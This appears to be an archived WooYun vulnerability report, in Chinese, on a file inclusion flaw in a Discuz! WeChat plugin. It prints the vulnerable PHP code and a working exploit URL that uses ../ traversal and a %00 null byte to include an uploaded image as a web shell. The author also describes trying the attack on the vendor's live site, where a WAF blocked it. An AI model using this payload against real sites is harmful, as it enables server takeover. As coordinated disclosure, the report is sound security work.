当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(94) 关注此漏洞

缺陷编号: WooYun-2014-79517

漏洞标题: Discuz! 微信公众平台插件前台任意文件包含,可直接shell

相关厂商: Discuz!

漏洞作者: menmen519

提交时间: 2014-10-15 18:59

公开时间: 2015-01-13 19:00

漏洞类型: 文件包含

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核

17人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-15: 细节已通知厂商并且等待厂商处理中
2014-10-16: 厂商已经确认,细节仅向厂商公开
2014-10-19: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-12-10: 细节向核心白帽子及相关领域专家公开
2014-12-20: 细节向普通白帽子公开
2014-12-30: 细节向实习白帽子公开
2015-01-13: 细节向公众公开

简要描述:

Discuz! 插件前台文件包含,可直接shell,本来想拿下dz插件中心主站 结果被可恶的百度云拦截,但是潜在问题还是存在

详细说明:

Discuz! 微信公众平台插件前台文件包含,可直接shell,直接看代码



hux_wx.inc.php:

code 区域
<?php
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
$wxsetting = $_G['cache']['plugin']['hux_wx'];
$paymoney = "extcredits".$wxsetting['money'];
$paymoneyname = $_G['setting']['extcredits'][$wxsetting['money']]['title'];
$mycash = C::t('#hux_wx#hux_common_member_count')->result_by_uid($_GET['uid'],$paymoney);
$user_cm = C::t('#hux_wx#hux_common_member')->fetch_by_uid($_GET['uid'],'groupid');
$gp = unserialize($wxsetting['gp']);
$postgp = unserialize($wxsetting['postgp']);
$appconfigsql = C::t('#hux_wx#hux_wx_config')->fetch_by_appid($_GET['mod'],'configs');
if ($appconfigsql) {
$appconfigs = explode('||',$appconfigsql['configs']);
foreach($appconfigs as $value){
$appconfigss = explode(':',$value);
$appconfig[$appconfigss[0]] = $appconfigss[1];
}
}
echo "gpc is ".get_magic_quotes_gpc()."<br>";

echo DISCUZ_ROOT.'./source/plugin/hux_wx/mod/'.$_GET['mod'].'/'.$_GET['ac'].'.php';
include DISCUZ_ROOT.'./source/plugin/hux_wx/mod/'.$_GET['mod'].'/'.$_GET['ac'].'.php';
?>





这里我们打印一下gpc 就是说明我们开启了这个功能



然后我们首先访问一下url:

http://localhost/Discuz_X3.2_SC_UTF8/upload/plugin.php?id=hux_wx:hux_wx&uid=1&mod=../../../..&ac=data/attachment/album/201410/15/181713m2a8nnnzjv2i52n6.png%00



1.png





效果看到了之后 我们再来看一下这个图片是怎么传递上去的,有是怎么找到的



2.png









啥也不说了,我们直接看插件中心的主站:http://**.**.**.**



3.png





这个居然首推主页,那就说明地位重要性



而且这个站点正好有上传相册,编辑相册的功能



4.png





这里被百度云waf拦截了,如果没有这个东西 次主站就直接shell了



ok!!!!

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-10-16 09:19

厂商回复:

非常感谢您发现问题。我们会尽快联系该插件作者,在问题修复之前将该插件下架处理。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-10-15 19:12 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区! Blog:http://www.xlixli....)
    1

    这么吓人

  2. 2014-10-15 19:17 | Noxxx ( 普通白帽子 | Rank:716 漏洞数:58 )
    0

    前排..

  3. 2014-10-15 19:47 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
    0

    我是小号

  4. 2014-10-15 20:00 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    太凶残了

  5. 2014-10-15 20:19 | 泳少 ( 普通白帽子 | Rank:255 漏洞数:83 | ★ 梦想这条路踏上了,跪着也要...)
    0

    来了。。赞

  6. 2014-10-15 21:30 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)
    0

    插件....

  7. 2014-10-16 03:51 | Let a person cry. ( 实习白帽子 | Rank:31 漏洞数:11 | xxoo)
    0

    这个必须关注

  8. 2014-10-16 08:33 | 机器猫 ( 普通白帽子 | Rank:1268 漏洞数:271 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)
    0

    呵呵,拽!

  9. 2014-10-16 09:00 | LooTan ( 路人 | Rank:4 漏洞数:2 | 拍黄片的大象派来的逗比)
    0

    路过备份

  10. 2014-10-16 10:02 | 教官 ( 路人 | Rank:7 漏洞数:1 | 权限在手 天下我有)
    0

    备份下

  11. 2014-10-16 10:17 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)
    0

    可怖

  12. 2014-10-16 11:41 | ieasyi ( 路人 | Rank:3 漏洞数:2 )
    0

    这个吊

  13. 2014-10-16 13:14 | 黑吊丝 ( 路人 | Rank:18 漏洞数:4 | 木心木肺黑吊丝)
    0

    找个吊

  14. 2014-11-05 12:48 | ′雨。 认证白帽子 ( 普通白帽子 | Rank:1332 漏洞数:198 | Only Code Never Lie To Me.)
    1

    为何 00 没被转义?

  15. 2014-11-05 13:00 | menmen519 ( 普通白帽子 | Rank:914 漏洞数:161 | http://menmen519.blog.sohu.com/)
    0

    @′雨。 没有走全局过滤

  16. 2014-11-07 15:27 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)
    0

    不给个$?

  17. 2014-11-07 16:02 | menmen519 ( 普通白帽子 | Rank:914 漏洞数:161 | http://menmen519.blog.sohu.com/)
    0

    @铁汉 @Finger 不知道啊 估计插件没有钱吧

  18. 2015-01-13 20:44 | goubuli ( 普通白帽子 | Rank:587 漏洞数:114 )
    1

    这个屌~

  19. 2015-01-13 22:19 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)
    1

    当小号 好辛苦

  20. 2015-01-14 09:58 | Walle ( 路人 | Rank:0 漏洞数:5 | ... 位卑、未敢忘忧国! ...)
    1

    牛b

  21. 2015-01-14 10:16 | BMa 认证白帽子 ( 核心白帽子 | Rank:2014 漏洞数:223 )
    1

    @menmen519 代码中看到是没有任何处理就带入了include?

  22. 2015-01-14 10:34 | menmen519 ( 普通白帽子 | Rank:914 漏洞数:161 | http://menmen519.blog.sohu.com/)
    1

    @BMa 恩

登录后才能发表评论,请先 登录